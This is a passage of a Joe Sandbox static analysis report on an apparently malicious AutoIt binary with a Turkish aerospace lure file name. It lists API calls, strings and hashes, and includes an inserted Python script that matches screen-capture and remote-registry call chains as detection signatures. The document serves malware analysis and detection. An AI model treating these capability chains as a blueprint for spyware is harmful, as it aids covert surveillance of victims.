                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FF78BC
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FF78D8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FF7902
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FF792A
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF7935
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF793A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                                    • Opcode ID: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                                                                                    • Instruction ID: aae9560a9fbd9076c5affa744b3ae3a3cf39dc3110e7427097570d3e0254044d
                                                                                                                                    • Opcode Fuzzy Hash: 4041b2683828e0368eb994c1efc59082facd2f2b403a367a556863b3962b9dd2
                                                                                                                                    • Instruction Fuzzy Hash: 2E4108B2C1422DABCF21EFA4EC85DEEB778BF08750F404069F905A7261DA799D04DB90
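Two of the API lists in this section describe recognisable capability chains: the GetDC / CreateCompatibleBitmap / CreateCompatibleDC / SelectObject / StretchBlt / GetDIBits sequence is a GDI screen grab, and the WNetAddConnection2W / RegConnectRegistryW / RegOpenKeyExW / RegQueryValueExW / CLSIDFromString sequence with the strings \IPC$, SOFTWARE\Classes\ and \CLSID reads as a ProgID-to-CLSID lookup in another machine's registry (the remote-computer path of AutoIt's object creation; that reading is mine). As an added example that is not part of the report, the Python below parses lines in the report's "• Api.MODULE(args), ref: ADDR" format and tests a function's direct calls against ordered signatures for both chains. The signature names, the A/W alternates and the treatment of "Part of subcall function" lines are my choices; the three traces are copied from the entries above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional, Tuple

# One "• Api.MODULE(args), ref: ADDR" line from a Joe Sandbox IDA-plugin API list.
# "Part of subcall function X:" lines are kept but flagged, so a signature only counts
# calls made by the function itself. The bullet is optional for copy-pasted text.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)(?:\.(?P<mod>\w+))?(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int
    subcall: Optional[str]  # callee address when the call lives in a sub-function


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse every API line in a pasted list; lines that do not match are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["mod"] or "", args, int(m["ref"], 16), m["sub"]))
    return calls


# A signature is an ordered list of steps; each step is the set of API names accepted
# at that point (A/W variants, BitBlt vs StretchBlt). It matches when the steps occur as
# an in-order subsequence of the function's direct calls, other calls in between allowed.
Signature = List[FrozenSet[str]]

SIGNATURES: Dict[str, Signature] = {
    "gdi-screen-capture": [
        frozenset({"GetDC", "GetWindowDC"}),
        frozenset({"CreateCompatibleDC", "CreateCompatibleBitmap"}),
        frozenset({"SelectObject"}),
        frozenset({"BitBlt", "StretchBlt"}),
        frozenset({"GetDIBits", "GetBitmapBits"}),
    ],
    "remote-registry-clsid-lookup": [
        frozenset({"WNetAddConnection2W", "WNetAddConnection2A"}),
        frozenset({"RegConnectRegistryW", "RegConnectRegistryA"}),
        frozenset({"RegOpenKeyExW", "RegOpenKeyExA"}),
        frozenset({"RegQueryValueExW", "RegQueryValueExA"}),
        frozenset({"CLSIDFromString"}),
    ],
}


def matches(calls: List[ApiCall], sig: Signature) -> bool:
    """Greedy in-order subsequence match over the function's own (non-subcall) calls."""
    step = 0
    for c in calls:
        if c.subcall is None and step < len(sig) and c.api in sig[step]:
            step += 1
    return step == len(sig)


def classify(text: str) -> List[str]:
    """Names of every signature that the pasted API list satisfies."""
    calls = parse_api_list(text)
    return [name for name, sig in SIGNATURES.items() if matches(calls, sig)]


# Traces copied from the report entries above (raw strings: the args contain backslashes).
CAPTURE_TRACE = r"""
• GetDC.USER32(00000000), ref: 0101738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0101739B
• CreateCompatibleDC.GDI32(?), ref: 010173A7
• SelectObject.GDI32(00000000,?), ref: 010173B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01017408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01017444
• ReleaseDC.USER32(00000000,?), ref: 0101748B
"""

REMOTE_TRACE = r"""
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
• _memset.LIBCMT ref: 00FF786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FF78A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FF78BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FF78D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FF7902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FF792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FF7935
"""

MENU_TRACE = r"""
• _memset.LIBCMT ref: 01002D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01002DDD
• DeleteMenu.USER32(01065890,00000005,00000000,000000F5,?,?), ref: 01002EF6
• TrackPopupMenuEx.USER32(01065890,00000000,?,00000000,00000000,00000000), ref: 01002F72
"""

if __name__ == "__main__":
    for name, trace in (("capture", CAPTURE_TRACE), ("remote", REMOTE_TRACE), ("menu", MENU_TRACE)):
        print(f"{name:8} -> {classify(trace) or ['no signature']}")
```

Treat a match as capability, not behaviour: these chains live in the AutoIt runtime and are therefore present in every compiled AutoIt binary, whether or not the embedded script ever calls them. The static match tells you what to look for in the dynamic trace and in the decompiled script; it is not by itself evidence that the sample took a screenshot or touched a remote registry.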
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                    • Opcode ID: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                                                                                    • Instruction ID: 5e6d77a9e29a23603adb38883e6db7354a579b1fd1137346ea5b9190e61ac068
                                                                                                                                    • Opcode Fuzzy Hash: 5965779acc915bab2dbc9d6a43d37e564593fea6d7a2d49ecf11a1c3d27dbc91
                                                                                                                                    • Instruction Fuzzy Hash: 9541583114435ACBCF81EE14DD56EEF3BA4BF01304F444448FCA51B696DB39996ADBA0
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FDE2A0,00000010,?,Bad directive syntax error,0102F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FFF7C2
                                                                                                                                    • LoadStringW.USER32(00000000,?,00FDE2A0,00000010), ref: 00FFF7C9
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    • _wprintf.LIBCMT ref: 00FFF7FC
                                                                                                                                    • __swprintf.LIBCMT ref: 00FFF81E
                                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FFF88D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
• Instruction ID: a1755a21311429ab1609e4c0fb4e5fea8d60aa9b83af68460324ff83779f6fd9
• Opcode Fuzzy Hash: 0b86e51dc7f5e35ecfdcc16d1f09397fb7a7718f4037585abc9c42d42f2bc8ac
• Instruction Fuzzy Hash: 9121717290021EABCF11EF91CC4AEFE7739BF18350F04446AF90566162DA759618EB51
APIs
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
  • Part of subcall function 00FA7924: _memmove.LIBCMT ref: 00FA79AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01005330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01005346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01005357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01005369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0100537A
Strings
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
• Instruction ID: 297a5f32984bc6aa0e8531726822f32ea4a9e7487e665194bb13057491410009
• Opcode Fuzzy Hash: 75e08b4b808ac35a330d9fa97b07dea1653111842b83113f365cafb9bfc7bfc2
• Instruction Fuzzy Hash: D211C8B1A5421D79E760B667DC49DFF7BBCFB9AB40F40445ABC41960D1DAA04904C9B0
APIs
Strings
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: d1ca51933ad5df5fe2241a2a4118c4930b596b342d66ce8e06382eb498063ce3
• Instruction ID: 7cd07a5b093b13b1346aa7a435a8a5001799e1b441933ea9d44677a9af90b112
• Opcode Fuzzy Hash: d1ca51933ad5df5fe2241a2a4118c4930b596b342d66ce8e06382eb498063ce3
• Instruction Fuzzy Hash: CF113531500116ABEB61AA34AC4AEDF77BCEB01311F0001AAF689D6091EF7989818B50
APIs
• timeGetTime.WINMM ref: 01004F7A
  • Part of subcall function 00FC049F: timeGetTime.WINMM(?,76C1B400,00FB0E7B), ref: 00FC04A3
• Sleep.KERNEL32(0000000A), ref: 01004FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01004FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01004FEC
• SetActiveWindow.USER32 ref: 0100500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01005019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 01005038
• Sleep.KERNEL32(000000FA), ref: 01005043
• IsWindow.USER32 ref: 0100504F
• EndDialog.USER32(00000000), ref: 01005060
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
• Instruction ID: e556d12b6f0ce6fa00e4299a1ea6ae0fd6024d4a8bfcba92b3e385493840b23c
• Opcode Fuzzy Hash: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
• Instruction Fuzzy Hash: D7216270204206AFF7329F34ED89F2A7BA9EB4A789F141018F6C5811E9CB6B4D508B61
APIs
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
  • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
• CoInitialize.OLE32(00000000), ref: 0100D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0100D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0100D691
• CoCreateInstance.OLE32(01032D7C,00000000,00000001,01058C1C,?), ref: 0100D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0100D74C
• CoTaskMemFree.OLE32(?,?), ref: 0100D7A4
• _memset.LIBCMT ref: 0100D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0100D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0100D840
• CoTaskMemFree.OLE32(00000000), ref: 0100D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0100D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0100D880
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 2374997776e46c8fba1face7c801e187108c2c81544bfcc83e4063142eca7505
• Instruction ID: 9ba34da364805203c632b2937b7978b16b6acb29e35df0a6292eb3acdae3ea17
• Opcode Fuzzy Hash: 2374997776e46c8fba1face7c801e187108c2c81544bfcc83e4063142eca7505
• Instruction Fuzzy Hash: A0B11A75A00109AFDB14DFA4CC84DAEBBB9FF49314F1480A9E949EB251DB74EE41CB60
APIs
• GetDlgItem.USER32(?,00000001), ref: 00FFC283
• GetWindowRect.USER32(00000000,?), ref: 00FFC295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FFC2F3
• GetDlgItem.USER32(?,00000002), ref: 00FFC2FE
• GetWindowRect.USER32(00000000,?), ref: 00FFC310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FFC364
• GetDlgItem.USER32(?,000003E9), ref: 00FFC372
• GetWindowRect.USER32(00000000,?), ref: 00FFC383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FFC3C6
• GetDlgItem.USER32(?,000003EA), ref: 00FFC3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FFC3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 00FFC3FE
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
• Instruction ID: b9b96edc6179990c54d591a34d094dd853c0baaddbec63c1f7aa103c286ded65
• Opcode Fuzzy Hash: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
• Instruction Fuzzy Hash: 16513F71B00209ABDB28CFB9DD89AAEBBB6FF88750F14812DF615D7294D7719D008B50
APIs
  • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FA20D3
• KillTimer.USER32(-00000001,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FA216E
• DestroyAcceleratorTable.USER32(00000000), ref: 00FDBCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBD0A
• DeleteObject.GDI32(00000000), ref: 00FDBD1C
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 641708696-0
APIs
  • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
• GetSysColor.USER32(0000000F), ref: 00FA21D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
• CharLowerBuffW.USER32(?,?,0102F910), ref: 0100A90B
• GetDriveTypeW.KERNEL32(00000061,010589A0,00000061), ref: 0100A9D5
• _wcscpy.LIBCMT ref: 0100A9FF
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
APIs
• _memset.LIBCMT ref: 0102716A
• CreateMenu.USER32 ref: 01027185
• SetMenu.USER32(?,00000000), ref: 01027194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027221
• IsMenu.USER32(?), ref: 01027237
• CreatePopupMenu.USER32 ref: 01027241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0102726E
• DrawMenuBar.USER32 ref: 01027276
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0102755E
• CreateCompatibleDC.GDI32(00000000), ref: 01027565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01027578
• SelectObject.GDI32(00000000,00000000), ref: 01027580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0102758B
• DeleteDC.GDI32(00000000), ref: 01027594
• GetWindowLongW.USER32(?,000000EC), ref: 0102759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010275B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010275BE
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
APIs
• _memset.LIBCMT ref: 00FC6E3E
  • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
• __gmtime64_s.LIBCMT ref: 00FC6ED7
• __gmtime64_s.LIBCMT ref: 00FC6F0D
• __gmtime64_s.LIBCMT ref: 00FC6F2A
• __allrem.LIBCMT ref: 00FC6F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6F9C
• __allrem.LIBCMT ref: 00FC6FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6FD1
• __allrem.LIBCMT ref: 00FC6FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC7006
• __invoke_watson.LIBCMT ref: 00FC7077
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 01002542
• GetMenuItemInfoW.USER32(01065890,000000FF,00000000,00000030), ref: 010025A3
• SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 010025D9
• Sleep.KERNEL32(000001F4), ref: 010025EB
• GetMenuItemCount.USER32(?), ref: 0100262F
• GetMenuItemID.USER32(?,00000000), ref: 0100264B
• GetMenuItemID.USER32(?,-00000001), ref: 01002675
• GetMenuItemID.USER32(?,?), ref: 010026BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01002700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002735
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
• Instruction ID: 581622b4c28afc3b932aeed21c887cd761b34a360bbdea9bca351099c247b597
• Opcode Fuzzy Hash: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
• Instruction Fuzzy Hash: 0861947050024AAFFB22DF68DC8CDBE7BB8FB45344F140099E982A3291D736A905DB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01026FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01026FA8
• GetWindowLongW.USER32(?,000000F0), ref: 01026FCC
• _memset.LIBCMT ref: 01026FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01026FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01027067
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
• Instruction ID: c6c8c0bc6a91702a2abda6419026c5ae09e80259ad435aba3408df78e9c5c42e
• Opcode Fuzzy Hash: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
• Instruction Fuzzy Hash: 82619F75900218EFDB21DFA8CC80EEE77F9EF09700F100199FA94AB2A1C775A945CB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FF6BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00FF6C18
• VariantInit.OLEAUT32(?), ref: 00FF6C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00FF6C4A
• VariantCopy.OLEAUT32(?,?), ref: 00FF6C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00FF6CB1
• VariantClear.OLEAUT32(?), ref: 00FF6CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00FF6CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CDC
• VariantClear.OLEAUT32(?), ref: 00FF6CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CF9
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
• Instruction ID: 8ae6bc7202f448265924638e9e16372a71ef7c9aae276106fcd7337c166225a2
• Opcode Fuzzy Hash: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
• Instruction Fuzzy Hash: CB418171A0011D9FCF10DFA8D8449ADBBB9EF08351F108069FA95E7261CF75AA45DFA0
APIs
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
  • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
• CoInitialize.OLE32 ref: 01018403
• CoUninitialize.OLE32 ref: 0101840E
• CoCreateInstance.OLE32(?,00000000,00000017,01032BEC,?), ref: 0101846E
• IIDFromString.OLE32(?,?), ref: 010184E1
• VariantInit.OLEAUT32(?), ref: 0101857B
• VariantClear.OLEAUT32(?), ref: 010185DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
